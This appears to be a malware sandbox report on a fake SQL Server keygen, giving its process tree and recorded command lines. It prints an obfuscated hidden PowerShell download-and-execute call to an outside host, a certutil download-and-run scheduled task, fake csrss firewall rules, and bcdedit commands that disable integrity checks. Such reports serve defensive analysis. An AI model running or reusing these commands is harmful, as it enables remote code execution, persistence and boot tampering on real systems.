Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exefirefox.exe1614953593757.exe1614953598241.exefirefox.exefirefox.exe1614953604538.exevict.exeaskinstall24.exevict.tmpsafebits.exegx2ph5ctpwi.exegx2ph5ctpwi.tmpchashepro3.exeSetup3310.exeIBInstaller_97039.exevpn.exewimapi.exechashepro3.tmpSetup3310.tmpIBInstaller_97039.tmpvpn.tmpwinlthst.exeAbbas.exechrome_proxy.exeThunderFW.exe0bnkzgsvvq4.exe0bnkzgsvvq4.tmpSetup.exeSetup.tmpWerFault.exeMiniThunderPlatform.exeMicrosoftEdge.exeMicrosoftEdgeCP.exePictureLAb.exePictureLAb.tmpSetup.exeSetup.tmpDelta.exeDelta.tmptapinstall.exeSetup.exezznote.exezznote.tmpjg4_4jaa.exeprolab.exeprolab.tmphjjgaa.exejfiag3g_gg.exejfiag3g_gg.exemask_svc.exemask_svc.exeMaskVPNUpdate.exeMicrosoftEdge.exeMicrosoftEdgeCP.exesafebits.exeaskinstall24.exevict.exevict.tmpSetup3310.exe

pid	process
3032	Setup.exe
2692	C0CA61A12E4C8B38.exe
352	C0CA61A12E4C8B38.exe
3920	firefox.exe
2044	1614953593757.exe
476	1614953598241.exe
4056	firefox.exe
4336	firefox.exe
4352	1614953604538.exe
4664	vict.exe
4656	askinstall24.exe
4724	vict.tmp
4820	safebits.exe
4836	gx2ph5ctpwi.exe
4936	gx2ph5ctpwi.tmp
4968	chashepro3.exe
4996	Setup3310.exe
5028	IBInstaller_97039.exe
4020	vpn.exe
4176	wimapi.exe
1920	chashepro3.tmp
4188	Setup3310.tmp
4384	IBInstaller_97039.tmp
4400	vpn.tmp
4276	winlthst.exe
668	Abbas.exe
4516	chrome_proxy.exe
3084	ThunderFW.exe
5200	0bnkzgsvvq4.exe
5268	0bnkzgsvvq4.tmp
5356	Setup.exe
5420	Setup.tmp
5800	WerFault.exe
5884	MiniThunderPlatform.exe
5980	MicrosoftEdge.exe
5688	MicrosoftEdgeCP.exe
1196	PictureLAb.exe
4212	PictureLAb.tmp
6128	Setup.exe
5276	Setup.tmp
5688	MicrosoftEdgeCP.exe
5828	Delta.exe
5632	Delta.tmp
4136	tapinstall.exe
2376	Setup.exe
5320	zznote.exe
3340	zznote.tmp
7128	jg4_4jaa.exe
6260	prolab.exe
6356	prolab.tmp
6516	hjjgaa.exe
6364	jfiag3g_gg.exe
6524	jfiag3g_gg.exe
6476	mask_svc.exe
5716	mask_svc.exe
5552	MaskVPNUpdate.exe
4940	MicrosoftEdge.exe
5756	MicrosoftEdgeCP.exe
5756	MicrosoftEdgeCP.exe
188	safebits.exe
6452	askinstall24.exe
4280	vict.exe
5220	vict.tmp
4588	Setup3310.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Microsoft.Sql.Server.2008.key.code.generator.by.DBC.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.execmd.exekey.exefile.exeCC6E.tmp.execmd.exe

description	pid	process	target process
PID 1032 wrote to memory of 2168	1032	Microsoft.Sql.Server.2008.key.code.generator.by.DBC.exe	cmd.exe
PID 1032 wrote to memory of 2168	1032	Microsoft.Sql.Server.2008.key.code.generator.by.DBC.exe	cmd.exe
PID 1032 wrote to memory of 2168	1032	Microsoft.Sql.Server.2008.key.code.generator.by.DBC.exe	cmd.exe
PID 2168 wrote to memory of 3612	2168	cmd.exe	keygen-pr.exe
PID 2168 wrote to memory of 3612	2168	cmd.exe	keygen-pr.exe
PID 2168 wrote to memory of 3612	2168	cmd.exe	keygen-pr.exe
PID 2168 wrote to memory of 648	2168	cmd.exe	keygen-step-1.exe
PID 2168 wrote to memory of 648	2168	cmd.exe	keygen-step-1.exe
PID 2168 wrote to memory of 648	2168	cmd.exe	keygen-step-1.exe
PID 2168 wrote to memory of 2096	2168	cmd.exe	keygen-step-3.exe
PID 2168 wrote to memory of 2096	2168	cmd.exe	keygen-step-3.exe
PID 2168 wrote to memory of 2096	2168	cmd.exe	keygen-step-3.exe
PID 2168 wrote to memory of 1664	2168	cmd.exe	keygen-step-4.exe
PID 2168 wrote to memory of 1664	2168	cmd.exe	keygen-step-4.exe
PID 2168 wrote to memory of 1664	2168	cmd.exe	keygen-step-4.exe
PID 3612 wrote to memory of 2220	3612	keygen-pr.exe	key.exe
PID 3612 wrote to memory of 2220	3612	keygen-pr.exe	key.exe
PID 3612 wrote to memory of 2220	3612	keygen-pr.exe	key.exe
PID 1664 wrote to memory of 2468	1664	keygen-step-4.exe	file.exe
PID 1664 wrote to memory of 2468	1664	keygen-step-4.exe	file.exe
PID 1664 wrote to memory of 2468	1664	keygen-step-4.exe	file.exe
PID 2096 wrote to memory of 3344	2096	keygen-step-3.exe	cmd.exe
PID 2096 wrote to memory of 3344	2096	keygen-step-3.exe	cmd.exe
PID 2096 wrote to memory of 3344	2096	keygen-step-3.exe	cmd.exe
PID 3344 wrote to memory of 3448	3344	cmd.exe	PING.EXE
PID 3344 wrote to memory of 3448	3344	cmd.exe	PING.EXE
PID 3344 wrote to memory of 3448	3344	cmd.exe	PING.EXE
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2220 wrote to memory of 3164	2220	key.exe	key.exe
PID 2468 wrote to memory of 4024	2468	file.exe	CC6E.tmp.exe
PID 2468 wrote to memory of 4024	2468	file.exe	CC6E.tmp.exe
PID 2468 wrote to memory of 4024	2468	file.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 4024 wrote to memory of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 2468 wrote to memory of 1540	2468	file.exe	cmd.exe
PID 2468 wrote to memory of 1540	2468	file.exe	cmd.exe
PID 2468 wrote to memory of 1540	2468	file.exe	cmd.exe
PID 1540 wrote to memory of 3208	1540	cmd.exe	PING.EXE
PID 1540 wrote to memory of 3208	1540	cmd.exe	PING.EXE
PID 1540 wrote to memory of 3208	1540	cmd.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\Microsoft.Sql.Server.2008.key.code.generator.by.DBC.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft.Sql.Server.2008.key.code.generator.by.DBC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2168

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3612

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:3164

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:648

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:3448

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1664

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468

C:\Users\Admin\AppData\Roaming\CC6E.tmp.exe
"C:\Users\Admin\AppData\Roaming\CC6E.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4024

C:\Users\Admin\AppData\Roaming\CC6E.tmp.exe
"C:\Users\Admin\AppData\Roaming\CC6E.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:3208

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3032

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1216

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2692

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:3920

C:\Users\Admin\AppData\Roaming\1614953593757.exe
"C:\Users\Admin\AppData\Roaming\1614953593757.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614953593757.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2044

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4056

C:\Users\Admin\AppData\Roaming\1614953598241.exe
"C:\Users\Admin\AppData\Roaming\1614953598241.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614953598241.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:476

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4336

C:\Users\Admin\AppData\Roaming\1614953604538.exe
"C:\Users\Admin\AppData\Roaming\1614953604538.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614953604538.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4352

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3084

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:5884

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:352

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:3780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:1336

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
6⤵
PID:3012

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:3104

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
5⤵
PID:2576

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:2240

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
4⤵
- Executes dropped EXE
PID:208

C:\Users\Admin\AppData\Local\Temp\SNXE9XJP7P\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\SNXE9XJP7P\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1564

C:\Users\Admin\AppData\Local\Temp\SNXE9XJP7P\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\SNXE9XJP7P\multitimer.exe" 1 3.1614953383.60423ba79bf8a 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4448

C:\Users\Admin\AppData\Local\Temp\SNXE9XJP7P\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\SNXE9XJP7P\multitimer.exe" 2 3.1614953383.60423ba79bf8a
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4508

C:\Users\Admin\AppData\Local\Temp\kcs10zgj45a\vict.exe
"C:\Users\Admin\AppData\Local\Temp\kcs10zgj45a\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4664

C:\Users\Admin\AppData\Local\Temp\is-K0EP1.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K0EP1.tmp\vict.tmp" /SL5="$60208,870426,780800,C:\Users\Admin\AppData\Local\Temp\kcs10zgj45a\vict.exe" /VERYSILENT /id=535
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4724

C:\Users\Admin\AppData\Local\Temp\is-EROM9.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-EROM9.tmp\wimapi.exe" 535
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4176

C:\Users\Admin\AppData\Local\Temp\rBSob1N4b.exe
"C:\Users\Admin\AppData\Local\Temp\rBSob1N4b.exe"
11⤵
- Loads dropped DLL
PID:6824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 908
12⤵
- Program crash
PID:6892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 896
12⤵
- Program crash
PID:7080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 988
12⤵
- Program crash
PID:6344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1020
12⤵
- Program crash
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1088
12⤵
- Program crash
PID:6920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1136
12⤵
- Program crash
PID:6212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1424
12⤵
- Program crash
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1460
12⤵
- Program crash
PID:6368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1532
12⤵
- Program crash
PID:6772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1672
12⤵
- Program crash
PID:7000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1712
12⤵
- Program crash
PID:640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 1680
12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6784

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:5016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\zqtb2mjizb3\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\zqtb2mjizb3\askinstall24.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4656

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:4780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:4844

C:\Users\Admin\AppData\Local\Temp\4yq4i3dkac2\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\4yq4i3dkac2\safebits.exe" /S /pubid=1 /subid=451
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4820

C:\Users\Admin\AppData\Local\Temp\zm41wuf5l0p\gx2ph5ctpwi.exe
"C:\Users\Admin\AppData\Local\Temp\zm41wuf5l0p\gx2ph5ctpwi.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4836

C:\Users\Admin\AppData\Local\Temp\is-T68ST.tmp\gx2ph5ctpwi.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T68ST.tmp\gx2ph5ctpwi.tmp" /SL5="$10278,870426,780800,C:\Users\Admin\AppData\Local\Temp\zm41wuf5l0p\gx2ph5ctpwi.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4936

C:\Users\Admin\AppData\Local\Temp\is-6UKCJ.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-6UKCJ.tmp\winlthst.exe" test1 test1
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4276

C:\Users\Admin\AppData\Local\Temp\h9HCatah8.exe
"C:\Users\Admin\AppData\Local\Temp\h9HCatah8.exe"
11⤵
- Loads dropped DLL
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 856
12⤵
- Program crash
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 264
12⤵
- Program crash
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 968
12⤵
- Executes dropped EXE
- Program crash
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 988
12⤵
- Program crash
PID:6280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1016
12⤵
- Program crash
PID:6408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1136
12⤵
- Program crash
PID:6732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1108
12⤵
- Program crash
PID:7016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1500
12⤵
- Program crash
PID:7160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1676
12⤵
- Program crash
PID:6528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1604
12⤵
- Program crash
PID:7036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1720
12⤵
- Program crash
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1688
12⤵
- Program crash
PID:6584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1476
12⤵
- Program crash
PID:6456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 792
12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6984

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:6820

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:5432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
- Blocklisted process makes network request
PID:5704

C:\Users\Admin\AppData\Local\Temp\qsqxgmotytm\app.exe
"C:\Users\Admin\AppData\Local\Temp\qsqxgmotytm\app.exe" /8-23
8⤵
- Executes dropped EXE
PID:5008

C:\Users\Admin\AppData\Local\Temp\qsqxgmotytm\app.exe
"C:\Users\Admin\AppData\Local\Temp\qsqxgmotytm\app.exe" /8-23
9⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1020

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
10⤵
PID:6200

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
11⤵
PID:6056

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-23
10⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6676

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
11⤵
- Creates scheduled task(s)
PID:6172

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
11⤵
- Creates scheduled task(s)
PID:6268

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
11⤵
- Loads dropped DLL
PID:3820

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
12⤵
- Modifies boot configuration data using bcdedit
PID:4404

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6508

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
12⤵
- Modifies boot configuration data using bcdedit
PID:6624

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
12⤵
- Modifies boot configuration data using bcdedit
PID:5600

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
12⤵
- Modifies boot configuration data using bcdedit
PID:6672

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
12⤵
- Modifies boot configuration data using bcdedit
PID:5432

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
12⤵
- Modifies boot configuration data using bcdedit
PID:5704

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
12⤵
- Modifies boot configuration data using bcdedit
PID:5212

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
12⤵
- Modifies boot configuration data using bcdedit
PID:6740

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
12⤵
- Modifies boot configuration data using bcdedit
PID:6908

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
12⤵
- Modifies boot configuration data using bcdedit
PID:6864

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
12⤵
- Modifies boot configuration data using bcdedit
PID:5336

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
12⤵
- Modifies boot configuration data using bcdedit
PID:4220

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
12⤵
- Modifies boot configuration data using bcdedit
PID:5100

